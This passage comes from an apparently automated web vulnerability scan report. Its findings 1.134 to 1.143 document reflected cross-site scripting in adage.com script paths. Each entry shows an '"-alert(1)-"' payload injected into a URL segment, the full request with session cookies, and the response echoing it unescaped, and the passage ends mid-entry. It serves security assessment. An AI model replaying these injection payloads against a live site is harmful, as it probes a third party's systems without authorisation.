The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32362"-alert(1)-"036c1a3cc14 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts/fancybox32362"-alert(1)-"036c1a3cc14/jquery.fancybox-1.3.4.css?1298944774 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:54 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=AE55CB971BED5C684E4F629C75E67B7988E20740; path=/
Set-Cookie: HMAC=B9105EB09BFA84241E3D91B47B8077344FDF3429; path=/
Set-Cookie: HMAC=C4ADE70FB4501673D04CF5F4595D1E695FE0B98C; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49478
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298944774";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts/fancybox32362"-alert(1)-"036c1a3cc14/jquery.fancybox-1.3.4.css"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cm
...[SNIP]...

1.134. http://adage.com/scripts/fancybox/jquery.fancybox-1.3.4.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/fancybox/jquery.fancybox-1.3.4.css

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23685"-alert(1)-"11221a24f63 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts/fancybox/jquery.fancybox-1.3.4.css23685"-alert(1)-"11221a24f63?1298944774 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:17 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=5BD1913E4766CC7AA3C9988B80FBB23F234A894B; path=/
Set-Cookie: HMAC=B1175D8822F39C60617574F35152CC67801DF7FF; path=/
Set-Cookie: HMAC=BBF594E808B9E9551C23E6FC2B1A681AB26CD9D7; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49478
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1298944774";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts/fancybox/jquery.fancybox-1.3.4.css23685"-alert(1)-"11221a24f63"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.135. http://adage.com/scripts/fancybox/jquery.fancybox-1.3.4.pack.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/fancybox/jquery.fancybox-1.3.4.pack.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d2228"-alert(1)-"3f6a5914556 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scriptsd2228"-alert(1)-"3f6a5914556/fancybox/jquery.fancybox-1.3.4.pack.js?1297540766 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:00 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=AC651B77F5AF5C429FAEC8350EECB595105DBE8D; path=/
Set-Cookie: HMAC=0F14FDB57E9023703EB5F77CE40C8DB55A927776; path=/
Set-Cookie: HMAC=DB23DC6941243B354DB6D45412F8A70B3A018749; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49482
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1297540766";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scriptsd2228"-alert(1)-"3f6a5914556/fancybox/jquery.fancybox-1.3.4.pack.js"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";

...[SNIP]...

1.136. http://adage.com/scripts/fancybox/jquery.fancybox-1.3.4.pack.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/fancybox/jquery.fancybox-1.3.4.pack.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65dbb"-alert(1)-"0eb3d0faa8f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts/fancybox65dbb"-alert(1)-"0eb3d0faa8f/jquery.fancybox-1.3.4.pack.js?1297540766 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:09 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=3BBA260AA6282135847486BE613CC3C5E9A1BBB3; path=/
Set-Cookie: HMAC=5724F655C2672E4260A21124B09C8CA1AB994778; path=/
Set-Cookie: HMAC=A5145FA84EF3B1C5EC8DF9D2DC906558E122A612; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49482
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
0u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1297540766";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts/fancybox65dbb"-alert(1)-"0eb3d0faa8f/jquery.fancybox-1.3.4.pack.js"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="
...[SNIP]...

1.137. http://adage.com/scripts/fancybox/jquery.fancybox-1.3.4.pack.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/fancybox/jquery.fancybox-1.3.4.pack.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 365e5"-alert(1)-"f04d5429c5b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts/fancybox/jquery.fancybox-1.3.4.pack.js365e5"-alert(1)-"f04d5429c5b?1297540766 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:12:19 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=17DB6C355A19E7BBA3D1788532321757A44401EF; path=/
Set-Cookie: HMAC=83091FD9AE521594115E127299AD2C2AC28A675D; path=/
Set-Cookie: HMAC=46A6BFF9ADA9E3128D7DD3AE70E468394345CA04; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49482
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
om";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1297540766";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts/fancybox/jquery.fancybox-1.3.4.pack.js365e5"-alert(1)-"f04d5429c5b"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.138. http://adage.com/scripts/javascript.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/javascript.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5bd4d"-alert(1)-"e75f5f53 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts5bd4d"-alert(1)-"e75f5f53/javascript.js?1314299432 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:14 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=B105902CECF646A35BB4F8375A004E474D091E61; path=/
Set-Cookie: HMAC=E72DD1D178C26E4DEE002141F6FDC36AD1A559F4; path=/
Set-Cookie: HMAC=6BA51D6A623A403BF493C9574DD29E4D8EBAF96D; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49454
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1314299432";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts5bd4d"-alert(1)-"e75f5f53/javascript.js"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.
...[SNIP]...

1.139. http://adage.com/scripts/javascript.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/javascript.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5603a"-alert(1)-"122445a79d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts/javascript.js5603a"-alert(1)-"122445a79d1?1314299432 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=1DDE5B82189FE4E37D5F7D50D475218FD2FCAA74; path=/
Set-Cookie: HMAC=AB028DE7156762235974E9CFA4CED6AE95DC89B5; path=/
Set-Cookie: HMAC=0F37F27C8F9F64C00F945194122577B048973CF6; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49457
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
bx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1314299432";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts/javascript.js5603a"-alert(1)-"122445a79d1"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.140. http://adage.com/scripts/jquery.easing.1.3.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/jquery.easing.1.3.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8620f"-alert(1)-"fc120b5733 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts8620f"-alert(1)-"fc120b5733/jquery.easing.1.3.js?1313425344 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=8D8B4E62F127FC630243F18B752F1D13C91FBB92; path=/
Set-Cookie: HMAC=F5589DF9A58488357D821D124583E9730D115E54; path=/
Set-Cookie: HMAC=F7D96B9A7F00D922CABA3EB9A241DE9BBBBD79F1; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49463
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1313425344";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts8620f"-alert(1)-"fc120b5733/jquery.easing.1.3.js"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js
...[SNIP]...

1.141. http://adage.com/scripts/jquery.easing.1.3.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/jquery.easing.1.3.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20fd1"-alert(1)-"c4cad94f04 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts/jquery.easing.1.3.js20fd1"-alert(1)-"c4cad94f04?1313425344 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:16 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=D57FF4FD6C95EB356DAA1DCFB39A94F4EAE86311; path=/
Set-Cookie: HMAC=C9C5BA2D5D3931CFB64B0D3B693B1B647210F7E2; path=/
Set-Cookie: HMAC=18F58A4B1C04C78CEDEF8CA26113C38C6CB2E9D1; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49463
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1313425344";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts/jquery.easing.1.3.js20fd1"-alert(1)-"c4cad94f04"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,.js";
hbx.dft="y";
hbx.e
...[SNIP]...

1.142. http://adage.com/scripts/jquery.onefblikev1.1.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/jquery.onefblikev1.1.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9d26a"-alert(1)-"002706296ff was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts9d26a"-alert(1)-"002706296ff/jquery.onefblikev1.1.js?1313425344 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:09:43 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=D21D3A428D5F1CD285F15F8EBC97AC6FF8868685; path=/
Set-Cookie: HMAC=D14883A7CFCC2D7D4160A250CE2B4F373F5C7A0E; path=/
Set-Cookie: HMAC=1FF1BADAF3D0A1071D581D8649EFDFFB612107BF; path=/
Vary: Accept-Encoding,User-Agent
Content-Length: 49467
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en" xmlns:og="http://opengraphprotocol.org/schema/">
<head profile="http://a9.com/-/spec/opensearch/1.1/">
<title>Oops! - Advertising Age</title>
<meta name="robots" conten
...[SNIP]...
c="HBX0100u";hbx.gn="ehg-crain.hitbox.com";

//CONFIGURATION VARIABLES
hbx.acct    = "DM530303F9CM83EN3";
hbx.pn        = "404.php?1313425344";//THIS IS THE UNIQUE PAGE IDENTIFIER
hbx.mlc    = "adage.com/scripts9d26a"-alert(1)-"002706296ff/jquery.onefblikev1.1.js"; //THIS IS THE UNIQUE PAGE LOCATION IDENTIFIER
hbx.pndef    = "title";
hbx.ctdef    = "full";

//OPTIONAL PAGE VARIABLES
//ACTION SETTINGS
hbx.fv="";
hbx.lt="none";
hbx.dlf="!.cms,
...[SNIP]...

1.143. http://adage.com/scripts/jquery.onefblikev1.1.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://adage.com
Path:   /scripts/jquery.onefblikev1.1.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6761"-alert(1)-"f29ca89fea7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scripts/jquery.onefblikev1.1.jsd6761"-alert(1)-"f29ca89fea7?1313425344 HTTP/1.1
Host: adage.com
Proxy-Connection: keep-alive
Referer: http://adage.com/article/digital/doubleverify-33m-funding/229525/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ADAGESESS=0d25b5e631b2fc5d043d5492bc297f21; HMAC=B7563EA22996A55443F2832D3B97D4FBAA83B97F; redirect=%2Farticle%2Fdigital%2Fdoubleverify-33m-funding%2F229525%2F

Response

HTTP/1.1 404 Not Found
Date: Thu, 01 Sep 2011 16:10:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: HMAC=792FCF44B88F1277C9A72A60929D702C4C47B0D1; path=/
